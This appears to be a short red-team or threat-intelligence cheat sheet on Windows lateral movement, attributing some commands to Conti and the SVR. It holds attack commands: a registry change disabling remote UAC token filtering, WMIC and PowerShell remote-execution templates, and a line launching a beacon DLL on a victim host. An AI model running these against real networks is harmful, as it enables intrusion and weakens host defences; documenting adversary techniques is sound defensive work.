# Lateral Movement ## Disable Remote UAC Restrictions {% code overflow="wrap" %} ```powershell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f ``` {% endcode %} ## WMIC Source: WMI allows users with the required privileges to execute commands in remote hosts without additional tools. Adversaries abuse this feature to move laterally in a compromised network. Adversaries used the following commands to execute commands in a remote host. {% code overflow="wrap" %} ```powershell wmic /node: /user: /password: process call create cmd.exe /c "" ``` {% endcode %} Or, with PowerShell: {% code overflow="wrap" %} ```powershell Invoke-WMIMethod -class Win32_Process -Name Create -ArgumentList "cmd /c " -ComputerName ``` {% endcode %} Conti TTP {% code overflow="wrap" %} ```powershell wmic /node:victim_ip process call create "rundll32.exe C:/ProgramData/beacon_dll DllRegisterServer" ``` {% endcode %} Russian Foreign Intelligence Service (SVR) TTP {% code overflow="wrap" %} ```powershell wmic /node: /user: /password: process call create "rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost" ``` {% endcode %}